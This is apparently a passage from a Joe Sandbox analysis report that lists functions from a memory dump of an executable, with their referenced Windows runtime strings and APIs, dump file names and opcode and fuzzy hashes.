Instruction ID: 88ef3ed556d4391eaddd45644923e84ee8c668fc4716c191726d2e16cc70325d
Opcode Fuzzy Hash: 837640e12625bca4aa523b1b017c493f6c4fe728a8a4c6122203b5324d6ebfaf
Instruction Fuzzy Hash: F401F73560C308DFE7217F54D844A9A3B69EFC4392F4405E8E5015F957CB21A841CBB4

Function 339151C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 339154C3
@, xrefs: 33915365

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 5a889632b09480af253ff8ec836f4eeb73a6e47ab755e2b6273a372de0db129d
Instruction ID: be326cb67be3dc350336b54bec90727bb58d359ec4260340e5be9be52b61f54b
Opcode Fuzzy Hash: 5a889632b09480af253ff8ec836f4eeb73a6e47ab755e2b6273a372de0db129d
Instruction Fuzzy Hash: 0932DEB5908316CBE720CF14C480B2EB7E9EF88794F56491EF995A7390E734D864CB92

Function 33905622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 33905698
RtlDebugPrintTimes.NTDLL ref: 3396061D

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: d271b45bb7c15337c0d6b5251c84cde909f7f051180100d81999f93e5e2998fe
Instruction ID: 4d4a78299b0bc4509c324c14bb4181892bbc6674a01c9be5e48741dde1ebf34c
Opcode Fuzzy Hash: d271b45bb7c15337c0d6b5251c84cde909f7f051180100d81999f93e5e2998fe
Instruction Fuzzy Hash: 7631C17560AB06EFE755AB24CA80A8AFBB9FF447A4F044125E94187E51DB74E821CFC0

Function 3397E372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 3397E3D1
Legacy, xrefs: 3397E3DA

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: e5ee81fb0196aaeaa7a720cceaf828bc58bf54650b965cbb0480fa03812f4970
Instruction ID: 2d40adf5808111f5cc818e50038c20233b2d9e3003241089b8127c3ebc73b730
Opcode Fuzzy Hash: e5ee81fb0196aaeaa7a720cceaf828bc58bf54650b965cbb0480fa03812f4970
Instruction Fuzzy Hash: 2A614CB1E00309DFEB24CFA8C840AADB7B9FF48780F54406DE559EB6A1EA30D940CB50

Function 339DB55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON

Download Yara Rule

Strings

RedirectedKey, xrefs: 339DB60E
\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 339DB5C4

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
API String ID: 0-1388552009
Opcode ID: a6c0b0996c50fa962afef6ebe5641c94fdf398275c12548a4cbd02604fdc557a
Instruction ID: 6b33ea5bd264376aef0271f98775fdfd07486c0e965dbbca80fd46424eba6eba
Opcode Fuzzy Hash: a6c0b0996c50fa962afef6ebe5641c94fdf398275c12548a4cbd02604fdc557a
Instruction Fuzzy Hash: 6061F2B5C01219EFDB11DF98C888ADEBBB8FB48755F50806AF805E7640DB359A45CFA0

Function 3391F640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON

Download Yara Rule

Strings

$, xrefs: 3391F716
$, xrefs: 3391F780

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$
API String ID: 3446177414-233714265
Opcode ID: 29a804e3c8005cbc01a12965ae443281adcbc7141bbd6a52d27ab657a06f1d42
Instruction ID: c4c83938f9e036bb28c49e35f6ce62d2d08b8cf4d8051d54b9c6c99717f32a30
Opcode Fuzzy Hash: 29a804e3c8005cbc01a12965ae443281adcbc7141bbd6a52d27ab657a06f1d42
Instruction Fuzzy Hash: F461CC76E01B4ECFEB20DFA8C580B99B7F5BF44354F144269D116BBA92CB74A950CB80

Function 3390A1E3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 3390A21B
RtlpResUltimateFallbackInfo Exit, xrefs: 3390A229

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 646ad53e8803e67cdadda4a6e6079bca0d387e8ef6d0eb11c0a5d4f9aa82cd88
Instruction ID: 94a111a1dc3112ecbccc46bbafa56acdc07581230140c6a63f67e7548cb32509
Opcode Fuzzy Hash: 646ad53e8803e67cdadda4a6e6079bca0d387e8ef6d0eb11c0a5d4f9aa82cd88
Instruction Fuzzy Hash: 2A41ED75A01704CBEB11CFA9C980B5A77B8EF857A4F1840A5EC80DF2A1E73AC914CB80

Function 3399314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Exit, xrefs: 3399318E
LdrResGetRCConfig Enter, xrefs: 3399317C

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
API String ID: 0-118005554
Opcode ID: 95fe0eb2d490c288e3377d2203f1118e1dd6805c18350cfcabfd4f0d7c88c578
Instruction ID: df6e2d845a30a3981284ba8fa8972099e939f242349fe34233b81bfcec126413
Opcode Fuzzy Hash: 95fe0eb2d490c288e3377d2203f1118e1dd6805c18350cfcabfd4f0d7c88c578
Instruction Fuzzy Hash: B031FE76608741CBE311CF69D880B5AB7E8EF88790F08086AFC54CB391EB30D905CB52

Function 339331BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

@, xrefs: 3393322D
.Local\, xrefs: 339331D5

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: .Local\$@
API String ID: 0-380025441
Opcode ID: db858be16eabe910752fb8ea04fd4894057b1b276d409983409863b5b3e4cd8e
Instruction ID: a60fd1a6931d9466ff4de9373e72a18977de1c888c02e7eda0a8144766246f10
Opcode Fuzzy Hash: db858be16eabe910752fb8ea04fd4894057b1b276d409983409863b5b3e4cd8e
Instruction Fuzzy Hash: 4F3186B598D305DFD311CF28C4C0A5BBBE8FB8A6A4F44052EF99497251D634DD058BD2

Function 339333D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3397289F
RtlpInitializeAssemblyStorageMap, xrefs: 3397289A

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
API String ID: 0-2653619699
Opcode ID: 807c275aa1c3316e7d2fb419b6240ea1e1abbc9923e0bf8f6bf44037125827cc
Instruction ID: e89806f355d20c30da98c52ad5ab1f0e2668019513c02a68cd900f4eb76e800d
Opcode Fuzzy Hash: 807c275aa1c3316e7d2fb419b6240ea1e1abbc9923e0bf8f6bf44037125827cc
Instruction Fuzzy Hash: 831106B6F15304FBE7158B488C84F9A77ACDB897A0F188029B904EB285DA75CD0087A0

Function 3390C6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 3390C7E3, 3390C960

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: ba3cfe8079f6c6c1efbbbc7301d53fc47138f5b1947c15a20adec019314aa8b8
Instruction ID: 29fc04757fdcd1ed774e9950768a08c62f4f7043e6a8239f9a297c28baa14b4e
Opcode Fuzzy Hash: ba3cfe8079f6c6c1efbbbc7301d53fc47138f5b1947c15a20adec019314aa8b8
Instruction Fuzzy Hash: C2825B79E00319DFEB24CFA9C98079DB7B9BF48390F148169E859AB251DB309985CF50

Function 3392E507 Relevance: 1.8, APIs: 1, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80be7d6d963281ca7ae75cda9e206548f3b0396c027b1451b825e0a0e17f4dc4
Instruction ID: 290729ada9ab28cf94a4f79bbb61a47cedfccd16a7cf280b7fc0a969acad4f1c
Opcode Fuzzy Hash: 80be7d6d963281ca7ae75cda9e206548f3b0396c027b1451b825e0a0e17f4dc4
Instruction Fuzzy Hash: 19A11771E01718DFFB21DB94C884B9D7BA8EF08BA8F090255E951FB295D7749D44CB80

Function 33901051 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 33901153

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 69b9abd97a3468590476aafac473ad8aceedf67b8f2f636ed5c41550ffb3c6f2
Instruction ID: 8c9f5ce3eee4294bba691447fbf0f90da2365345afcad7ac4301cfb8e47cc065
Opcode Fuzzy Hash: 69b9abd97a3468590476aafac473ad8aceedf67b8f2f636ed5c41550ffb3c6f2
Instruction Fuzzy Hash: 18B112B5A08341CFE354CF28C480A5ABBF5BB88354F184A6EF899D7352D771E885CB42

Function 33907623 Relevance: 1.7, APIs: 1, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d431f2871e1300fe13bcdaef68acbe20645e04209f2d2d786bf93d0760110996
Instruction ID: 355346942a10deec41094f6b2cf358a2ea7ced6f4441db2b562362de37e2a630
Opcode Fuzzy Hash: d431f2871e1300fe13bcdaef68acbe20645e04209f2d2d786bf93d0760110996
Instruction Fuzzy Hash: 10614075E05706EFDB08DF6CC880A9DFBB9BF48394F24816AE459A7341DB30A9518F90

Function 3390254C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 33902630

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: f23f748060052888d61f9e9a9890fc77114e8146c295241d633082258d0d2b52
Instruction ID: 6c9b4fc7220d138759aa617ca869aecabb7ae5206021a63b24a78087b12101f7
Opcode Fuzzy Hash: f23f748060052888d61f9e9a9890fc77114e8146c295241d633082258d0d2b52
Instruction Fuzzy Hash: 5C41EDB1901704CFE725EF64C940A49B7F9FF443A0F2482AED0969F6A1DB30AA81CF40

Function 33904779 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 33904817

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 3209c4f0459a76fd8dfebc2ecc8c04c65653e2c0e07916f54e984e194c4e42a1
Instruction ID: 1cc47970aa04ad2d88cba0547643758d8366ecf7921e52a2ff033a74af805df9
Opcode Fuzzy Hash: 3209c4f0459a76fd8dfebc2ecc8c04c65653e2c0e07916f54e984e194c4e42a1
Instruction Fuzzy Hash: 6741C0B4A04341CBE314DF28D8D4B2ABBEEEF81791F14482DE9419B2A1DB30D891CF91

Function 339056E0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 33905762

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 64c9fadd54c05d7e1bc412b75415fbdc91c97a56deb2b10a701c8ecec688af5a
Instruction ID: e1955456c9e8388a7e6ebfa0dfcf1c14ff9b03309d4ab53f3aef1728f6b86984
Opcode Fuzzy Hash: 64c9fadd54c05d7e1bc412b75415fbdc91c97a56deb2b10a701c8ecec688af5a
Instruction Fuzzy Hash: A331CF75B1AB05FFE7059B24CA80A99BBA9FF88294F445055EC008BF51CB35E830CF80

Function 339AE750 Relevance: 1.6, APIs: 1, Instructions: 91timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 339AE7B1

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 61fadab21f85445e4120929e9f01b0e6f63a3a566e71bba35f5d118fae035edc
Instruction ID: 09213bbdf2676a6e4f3b0e4ae285a2961f49d284d18df330e6ca242b2e0802db
Opcode Fuzzy Hash: 61fadab21f85445e4120929e9f01b0e6f63a3a566e71bba35f5d118fae035edc
Instruction Fuzzy Hash: E43137B6D05305CFC700DF1DC44094ABBF9FF89695F4886AEE488AB261D631D905CF92

Function 33903536 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 339035C1

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 04295769076b1c5dcfe5df6332b5b5974802393da0997d2ad626290b8ec432b6
Instruction ID: 7e40f6db88eb46cd858df2374a10a60ce1901a363ff61cdbdbdd9649ec4f7e61
Opcode Fuzzy Hash: 04295769076b1c5dcfe5df6332b5b5974802393da0997d2ad626290b8ec432b6
Instruction Fuzzy Hash: 5D213435A01B04DFD322AF49C980B1ABBA9FF88B94F480459E8851B692C770EC48CF81

Function 338F92AF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 338F92D5

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 4b9ea85ab11ebd44ad5c397a4700aeeb63b28f096608445b437def3144cf9db1
Instruction ID: 5e8ce0f1983042b87f9bc13f27e4550eb6a663dc22c635706d444b612a0575b1
Opcode Fuzzy Hash: 4b9ea85ab11ebd44ad5c397a4700aeeb63b28f096608445b437def3144cf9db1
Instruction Fuzzy Hash: 12F0F032200704ABD3319B99DC04F9BBBFDEF84700F080119A55293491D6B1F90AC650

Function 3390965A Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

@, xrefs: 33909713

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
Instruction ID: de57fdf486fe50890e45da75179344ba74907e6665bdddc168dff1ea2ddcc165
Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
Instruction Fuzzy Hash: 99613BB6D01319EFDB11DFA9C840BDEBBB9EF84754F14415AE850AB260D7749A01CFA0

Function 339102F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#%u, xrefs: 33964B8F

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: #%u
API String ID: 0-232158463
Opcode ID: bb3b8e345d5a045dec166324a6d17362be53ec753bb6544e2e2e409a66217998
Instruction ID: 997b905ec8a14efa1f284bb380a40b950c12a5755c8adfd2ed0e67cd891d0896
Opcode Fuzzy Hash: bb3b8e345d5a045dec166324a6d17362be53ec753bb6544e2e2e409a66217998
Instruction Fuzzy Hash: DA713872E0120ADFDB05CFA9C980BAEB7F8BF08744F154069E901FB651EA34E951CB60

Function 3391E547 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 3391E5C4

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: d4f1fd363c799fa105b693e09605ba40e37626ded3f031e08374f93f75e20d34
Instruction ID: 675b25bb8f290ad84f505cd81fdbbdf132f66d2379537cccc15c94123d4630bb
Opcode Fuzzy Hash: d4f1fd363c799fa105b693e09605ba40e37626ded3f031e08374f93f75e20d34
Instruction Fuzzy Hash: 8C41D076D29309DFE710DA64C840B6BB7ECAF88784F840A2DF484F7291EA74C914C792

Function 339341BB Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

@, xrefs: 33934220

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
Instruction ID: 1aa8d90b731ee809c0bc59e7e630596ada9698c310017a306b11d66af1a2793a
Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
Instruction Fuzzy Hash: 9E5178B1905711EFD320CF29C840A6BB7F8FF48710F00892AF9959B6A0E7B4E954CB91

Function 3397C3B0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 3397C3FF

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 35a8a7b54cf472ae25a8cf4e9f26d63126f6d7b6353f6b4e0d9d573108d83367
Instruction ID: 130b04c256a4a9b21c7a015984aa985f270e567c4365d93c7ffaffaa0616df01
Opcode Fuzzy Hash: 35a8a7b54cf472ae25a8cf4e9f26d63126f6d7b6353f6b4e0d9d573108d83367
Instruction Fuzzy Hash: C44130B2D0062DEBDB21DA50CC80FDEB77CAF44754F0045E5EA09AB181DB709E888FA4

Function 3393360F Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

Flst, xrefs: 33933651

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: Flst
API String ID: 0-2374792617
Opcode ID: 7c38af70bd02fdc1ac39b175f507c788971d9a18fd01bd225885bc81c486df24
Instruction ID: 23a4bd577b728f00de258fedd420405877b2329c0e1ef5e5171196a5ea01f0f3
Opcode Fuzzy Hash: 7c38af70bd02fdc1ac39b175f507c788971d9a18fd01bd225885bc81c486df24
Instruction Fuzzy Hash: 8C41BAF1656301DFD304CF18C580606BBE9EF4A764F18816EE4998F281DB71C942CB91

Function 338F96E0 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

3.w3.w, xrefs: 338F9757

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 3.w3.w
API String ID: 3446177414-1576444995
Opcode ID: 33696bde5c780565f77843bd5f683a851a677055b38a6ebf43386ce588022d76
Instruction ID: 41a89b698f58434ac10e400423bbb63d19bfc4806c418efbc01e6ee57dcc120a
Opcode Fuzzy Hash: 33696bde5c780565f77843bd5f683a851a677055b38a6ebf43386ce588022d76
Instruction Fuzzy Hash: 5D210476A00714EFE321DF98D840B1A7BF4EB88B90F260429A564AF341DB72D942CBD0

Function 3397C6F2 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 3397C722

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

